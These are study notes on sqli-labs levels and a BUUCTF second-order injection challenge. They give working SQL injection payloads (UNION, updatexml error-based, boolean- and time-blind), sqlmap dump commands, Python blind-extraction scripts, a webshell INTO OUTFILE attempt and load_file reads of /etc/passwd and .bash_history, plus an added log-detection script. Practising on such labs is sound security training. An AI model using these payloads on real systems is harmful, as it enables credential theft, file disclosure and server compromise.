Level 1:
Approach:
Use ORDER BY to find the number of columns; there are 3 columns;
Make the first query return no rows (id=-1) so the UNION result is displayed; the database name is security;
Final goal: inject to obtain the administrator account and password;
To do that you first need the name of the administrator table,
then its column names.
1. List table names: select table_name from information_schema.tables where table_schema='security';
2. List the table's column names: select column_name from information_schema.columns where table_schema='security' and table_name='users';
3. Get accounts and passwords: select username,password from security.users;
4. Get the current user and database: ?id=-1" union select 1,user(),database()--+
Level 5:
1. Try to find the injection point.
2. Try error-based injection: ?id=1%27 and updatexml(1,concat(0x7e,user(),0x7e),1)--+
3. ?id=1%27 and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password)from users),0x7e),1)--+
4. select substr(database(),1,1); substr(str, pos, len) takes len characters starting at position pos, counted from the left, so this returns the first character of the database name.
Level 6
1. List table names: ?id=1" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+
2. List the column names of that table:
?id=1" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)--+
Level 7
1. How to write out a webshell
// connectivity
// the MySQL user must have root privileges
// the physical path of the website must be known
// E:\phpstudy_pro\www\sqli-labs\
// one parameter must be empty (secure_file_priv must be empty)
select substr(database(),32,64);
2. Write out the webshell: ?id=1')) union select 1,2,"<?php phpinfo();" into outfile "E:/phpstudy_pro/www/sqli-labs/webshell.php";--+
It failed; I tried many times and the file was still not written.
Level 8
1. Take the first character of the database name; if the guess is wrong the page shows nothing: ?id=1' and ascii(substr(database(),1,1))=115--+
2. Use sqlmap to list the databases: python sqlmap-1.8/sqlmap.py -u http://127.0.0.1/sqli-labs/Less-8/?id=1 -dbs
3. List the tables in security: python sqlmap-1.8/sqlmap.py -u http://127.0.0.1/sqli-labs/Less-8/?id=1 -D security --tables
4. List the columns of users: python sqlmap-1.8/sqlmap.py -u http://127.0.0.1/sqli-labs/Less-8/?id=1 -D security -T users --columns
5. Dump the accounts and passwords in users: python sqlmap-1.8/sqlmap.py -u http://127.0.0.1/sqli-labs/Less-8/?id=1 -D security -T users --dump -C "username,password"
6. Use Python to extract the database name security
import requests

url = 'http://127.0.0.1/sqli-labs/Less-8/index.php'

def inject_database(url):
    name = ''
    # Recover the database name one character at a time (positions 1..19)
    for i in range(1, 20):
        # Try every printable ASCII code for this position
        for j in range(32, 129):
            payload = "1' and ascii(substr(database(), %d, 1)) = %d-- " % (i, j)
            res = {"id": payload}
            r = requests.get(url, params=res)
            # Less-8 prints this string only when the condition is true
            if "You are in..........." in r.text:
                name = name + chr(j)
                print(name)
                break

inject_database(url)
Level 9
1. Use binary search to extract the database name
import time
import requests

url = 'http://127.0.0.1/sqli-labs/Less-9/index.php'

def inject_database(url):
    name = ''
    for i in range(1, 20):
        # Binary search over the printable ASCII range for this position
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            # sleep(1) fires only when the character code is greater than mid
            payload = "1' and if(ascii(substr(database(), %d, 1)) > %d, sleep(1), 0)-- " % (i, mid)
            res = {"id": payload}
            start_time = time.time()
            r = requests.get(url, params=res)
            end_time = time.time()
            if end_time - start_time >= 1:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        # Code 32 (space) means there is no character at this position: the name is complete
        if mid == 32:
            break
        name = name + chr(mid)
        print(name)

inject_database(url)
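As an added example that is not part of these notes, the following script shows what the error-based, boolean-blind, time-blind and file-write requests from Levels 5 through 9 look like from the defender's side: it decodes request paths from access-log lines and flags the SQL fragments those payloads share, then counts blind probes per client, since the character-by-character loops above produce hundreds of near-identical requests. The log lines are constructed, and the signature names and functions are my own.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines modelled on the Less-1/5/7/8/9 requests in these notes
SAMPLE_LOG = """\
127.0.0.1 - - [10/May/2024:10:00:01 +0800] "GET /sqli-labs/Less-1/?id=1 HTTP/1.1" 200 512
127.0.0.1 - - [10/May/2024:10:00:02 +0800] "GET /sqli-labs/Less-5/?id=1%27%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--+ HTTP/1.1" 200 734
127.0.0.1 - - [10/May/2024:10:00:03 +0800] "GET /sqli-labs/Less-8/?id=1%27+and+ascii(substr(database()%2C+1%2C+1))+%3D+115--+ HTTP/1.1" 200 512
127.0.0.1 - - [10/May/2024:10:00:05 +0800] "GET /sqli-labs/Less-9/?id=1%27+and+if(ascii(substr(database()%2C+1%2C+1))+%3E+80%2C+sleep(1)%2C+0)--+ HTTP/1.1" 200 512
127.0.0.1 - - [10/May/2024:10:00:06 +0800] "GET /sqli-labs/Less-7/?id=1%27))+union+select+1,2,3+into+outfile+%22E:/x.php%22--+ HTTP/1.1" 200 512
"""

# One signature per technique in the notes, keyed on the fragment every variant of it shares
SIGNATURES = {
    "error_based_updatexml": re.compile(r"\bupdatexml\s*\(", re.I),
    "boolean_blind_substr": re.compile(r"\bascii\s*\(\s*substr\s*\(", re.I),
    "time_blind_sleep": re.compile(r"\bsleep\s*\(", re.I),
    "file_write_outfile": re.compile(r"\binto\s+outfile\b", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema_enumeration": re.compile(r"\binformation_schema\.", re.I),
}
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')

def classify_request(path):
    """Decode the path (twice, to catch double-encoding) and return matching signature names."""
    decoded = unquote_plus(unquote_plus(path))
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

def scan_log(text):
    """Return (line_no, client_ip, path, matches) for every log line that hits a signature."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        matches = classify_request(m.group(1)) if m else []
        if matches:
            hits.append((n, line.split(" ", 1)[0], m.group(1), matches))
    return hits

def blind_probe_count(hits):
    """Count blind-injection probes per client IP: a long run of them is the extraction loop above."""
    counts = {}
    for _, ip, _, matches in hits:
        if "boolean_blind_substr" in matches or "time_blind_sleep" in matches:
            counts[ip] = counts.get(ip, 0) + 1
    return counts

if __name__ == "__main__":
    for n, ip, path, matches in scan_log(SAMPLE_LOG):
        print("line %d %s %s -> %s" % (n, ip, path, ", ".join(matches)))
```

A real deployment would alert on blind_probe_count exceeding a threshold per minute rather than on single hits, since one ascii(substr()) request is noise but a few hundred from one client is the loop in Levels 8 and 9.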
Level 11
1. Parameters are sent via POST; log in as a user
2. Enter this as the username to list the table names; the password can be anything: a' union select 1,group_concat(table_name)from information_schema.tables where table_schema='security'#
Level 13
1. Use error-based injection to get the current user; the password can be anything: aaa') and updatexml(1,concat(0x7e,(select user()),0x7e),1)#
2. Determine the database name: ') and updatexml(1,concat(0x7e,(select database()),0x7e),1)-- +
3. Determine the table name: ') and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),1)-- +
4. Determine the column name: ') and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x7e),1)-- +
5. Read the data: ') and updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1)-- +
Level 24
1. Second-order injection
Log in with username admin and password 123
2. Reset the password to 123456
3. Logging in with password 123 fails
4. Logging in with password 123456 succeeds
Second-order injection practice 1
1. Make a post
2. Brute-force the password with Burp Suite: zhangwei666
3. Scan the address with dirmap: python dirmap.py -i [instance URL] -lcf (the instance URL is not preserved; the page only shows the BUUCTF "instance can't be reached" notice)
4. Append .git to the URL: normally the response is Not Found (the directory does not exist), but a Forbidden response means the .git directory is exposed: [instance URL]
5. Make a post and submit a comment to obtain the root user
6. In the comment operation a single quote directly closes the string: ',content=(select(load_file("/etc/passwd"))),/*
*/#
7. Next, read files; note that it is seen to run under /home/www with bash
',content=(select(load_file("/home/www/.bash_history"))),/*
8. ',content=(select(load_file("/tmp/html/.DS_Store"))),/*
9. The output is not shown completely, so display it hex-encoded: ',content=(select hex(load_file("/tmp/html/.DS_Store"))),/*
10. ',content=(select hex(load_file("/tmp/html/flag_8946e1ff1ee3e40f.php"))),/*
11. Found that the flag was fake: ',content=(select hex(load_file("/var/www/html/flag_8946e1ff1ee3e40f.php"))),/*